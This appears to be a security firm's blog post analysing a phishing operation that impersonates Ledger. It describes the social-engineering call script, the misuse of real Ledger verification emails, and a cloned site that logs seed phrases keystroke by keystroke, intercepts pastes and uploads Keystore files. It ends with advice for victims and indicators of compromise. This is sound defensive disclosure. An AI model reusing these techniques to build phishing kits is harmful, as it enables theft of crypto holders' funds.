It started with bacon and eggs.
Michael Roberts, one of Rexxfield’s former founders, was having his usual morning coffee when a phishing email landed in his inbox. It was impersonating ANZ Bank — claiming suspicious activity from an IP address in Frankfurt, Germany. The sender address? . Not even close to ANZ.
Most people would delete it and move on. Michael called the scammers instead.
Over the next two hours, Michael social-engineered the threat actors into revealing their entire operation. By pretending to be an unsophisticated crypto holder with multiple Bitcoin in a wallet he couldn’t figure out how to withdraw from, he extracted information the scammers would never have given up voluntarily: money mule bank accounts, crypto wallet addresses, their IP address, voice recordings of the call, and, critically, the secret method they used to convince victims they were real Ledger Support.
That secret method is what makes this operation different from most phishing campaigns we investigate.
The Scammers Sent Real Verification Emails from Ledger’s Own Servers
Here’s what the threat actors revealed during the call with Michael: they used actual Ledger hardware and a legitimate Ledger Recover subscription to trigger real verification emails — sent from , directly to their victims.
Think about that for a moment. The victim receives an email that passes every authenticity check. The sender domain is correct. The branding is correct. The verification code is real. And the scammer, posing as “Ledger Support” on a voice call, simply asks the victim to read back the code so they can “verify your identity.”
The victim hands over the verification code. The scammer uses it to access the victim’s account through Ledger Recover.
This isn’t a cloned email template. This is Ledger’s actual infrastructure being weaponized as a trust-building tool inside a social engineering chain. The attackers understood that a real email from was worth more than any spoofed message they could craft themselves.
A Fake Ledger Live Site That Was Nearly Indistinguishable from the Real Thing
While Michael kept the scammers busy on the phone, Rexxfield’s threat hunting team went to work mapping their infrastructure. The primary phishing domain — ledger.com.lc — hosted a full clone of Ledger’s production interface built with a level of detail that went beyond typical phishing kits.
The kit ripped assets directly from Ledger’s production CDN. Ledger’s proprietary HMAlphaMono font — including the content-hashed filename from Ledger’s Vite build — was embedded in the kit’s source code. Product images for all six Ledger hardware devices (Stax, Flex, Nano Gen5, Nano S, Nano S Plus, and Nano X) were sourced directly from Ledger’s build with their original filenames intact. This wasn’t someone rebuilding Ledger’s UI from screenshots. This was a direct mirror of production assets.
Seven Pages, One Goal: Your Seed Phrase
The phishing kit funneled victims through a carefully staged seven-page sequence, each designed to build trust, manufacture urgency, and ultimately harvest the one thing that controls a crypto wallet: the recovery seed phrase.
Stage 1 — Fake device selection. The victim chooses their Ledger device from a grid of six products with authentic imagery. Every button leads to the same place. The selection is meaningless — it exists to make the site feel real at first contact.
Stage 2 — Options menu with live surveillance. The victim sees five wallet management options: diagnostic check, wallet restore, new wallet setup, Keystore import, and one more. Every click fires a JSON POST to log.php before navigation, recording the selected option and an ISO 8601 timestamp. The operator knows what the victim is thinking before they reach the next page. This page also embeds a live chat widget.
Stage 3 — Fake diagnostic with scripted suspense. A 26-second countdown cycles through five status messages — “Finding devices,” “Device located,” “Verifying firmware integrity,” “Analyzing security protocols,” and “Finalizing diagnostic report.” No actual device communication occurs. The countdown exists solely to build procedural credibility before delivering the manufactured crisis.
Stage 4 — The fabricated emergency. A red-styled error page displays “CRITICAL ISSUE DETECTED” alongside a fictional error code (LD3-XI3-0x4A7F) in monospace. The warning copy claims hardware integrity has been compromised. The call-to-action reads “Repair and Recover Your Device” — which links directly to the seed phrase harvesting page.
Stage 5 — Seed phrase capture. This is the core of the operation. The victim enters their 12, 18, or 24-word BIP39 recovery phrase, plus an optional passphrase. And here’s where the kit gets aggressive: it doesn’t wait for the victim to hit submit.
Three Exfiltration Mechanisms Running Simultaneously
The seed phrase harvesting page runs three independent data capture systems at once — a level of redundancy that tells you how valuable each seed phrase is to these operators.
Real-time keystroke logging. Every word input field has an event listener that fires a POST request on every single keystroke. The attacker receives the seed phrase word by word, in real time, before the victim ever clicks a button.
Clipboard paste interception. If the victim pastes their seed phrase, the handler suppresses the default browser behavior, splits the clipboard text on whitespace, fills each field sequentially, and fires a separate POST for every individual word. One paste action triggers 24 simultaneous logging requests — a fully indexed seed capture in under a second.
Form submission failsafe. When the victim clicks submit, the complete word list and passphrase are bundled and POSTed to a separate endpoint (send.php). This is redundant by design: even if individual keystroke requests fail, the final submission captures everything.
The passphrase field gets the same treatment — its toggle state and every keystroke are logged independently.
And if any word the victim enters doesn’t match the official BIP39 English wordlist? The kit rejects it after an 11-second delay and forces re-entry. This isn’t a bug — it’s a quality filter. The operators only want valid, usable seed phrases reaching their backend.
A Second Attack Path for Software Wallet Users
The kit maintained a parallel track for victims using software wallets with Keystore files. When a victim selected or dropped a file into the upload area, that file was immediately exfiltrated via a background fetch request — before the victim clicked any “Import” button and before entering a password. Even if the victim abandoned the form or closed the tab, the attackers already had the encrypted file.
A keystroke logger on the password field captured the decryption key separately. Two independent data streams, one encrypted wallet.
The Operators Were Watching in Real Time
Both the options menu and the seed phrase page embedded a fully functional live chat widget. This wasn’t decorative. The system collected victim names and email addresses at session start, generated a unique 32-character hex session ID per victim, and polled the backend every two seconds for incoming operator messages.
A comment in the session ID generation code explicitly referenced compatibility with an “admin panel” — confirming a separate operator-facing dashboard for managing multiple concurrent victim sessions. This is an operator-in-the-loop architecture. A human attacker could interact with hesitant victims in real time, address their concerns, and talk them through entering their seed phrase.
What Happened When the Scammers Realized Someone Was Hunting Them
After hours of sustained social engineering and infrastructure mapping by the Rexxfield team, the threat actors finally realized they were being pursued. They shut down their website. They checked their banking accounts.
But it was already too late. The phishing infrastructure had been archived and analyzed. Banking accounts tied to the operation were frozen. Money tracing was underway. New investigative leads had been identified and documented. Takedown requests had been submitted for the scammer domains.
All of that before Michael finished his morning routine.
What This Means for Crypto Holders
This operation illustrates a shift in how phishing campaigns target cryptocurrency users. The attackers didn’t just clone a website — they integrated Ledger’s own verification infrastructure into their social engineering chain, giving victims a genuine trust signal at the exact moment they needed to lower their guard.
If you hold crypto on a hardware wallet, keep these realities in mind:
Ledger will never call you. No legitimate hardware wallet company will cold-call or cold-email you asking to “verify” anything. If someone contacts you claiming to be Ledger Support, it’s a scam — even if the verification email they trigger is real.
A real email doesn’t mean a real support interaction. Attackers can use legitimate services to generate authentic-looking communications. The email being real doesn’t make the person who told you to expect it real.
Your seed phrase is the master key. There is no diagnostic, no firmware update, no “wallet insurance activation” that requires you to type your recovery phrase into a website. Ever. Full stop.
Urgency is the weapon. Every stage of this kit was designed to manufacture a crisis and compress the victim’s decision-making window. Real security issues don’t require you to act in the next 30 seconds.
Indicators of Compromise
Primary phishing domain: ledger.com.lc
Phishing email sender (ANZ impersonation):
Server-side endpoints observed in kit source:
- log.php — centralized keystroke, paste, and event logging
- send.php — redundant seed phrase capture on form submission
- upload_early.php — silent pre-submission Keystore file exfiltration
- backend/save_user_message.php — live chat message persistence
- backend/get_messages.php — operator message delivery (polled every 2 seconds)
- load_seed2.php — post-harvest decoy seed phrase generator
Ripped Ledger asset confirming CDN mirroring: HMAlphaMono-Medium-O3SXNZYE.woff2 (content-hash filename from Ledger’s production Vite build)
Rexxfield is a first responder in cybercrime investigations since 2008. We support law enforcement, legal teams, and victims globally. If you’ve encountered this phishing kit or a similar crypto scam, contact our investigators.
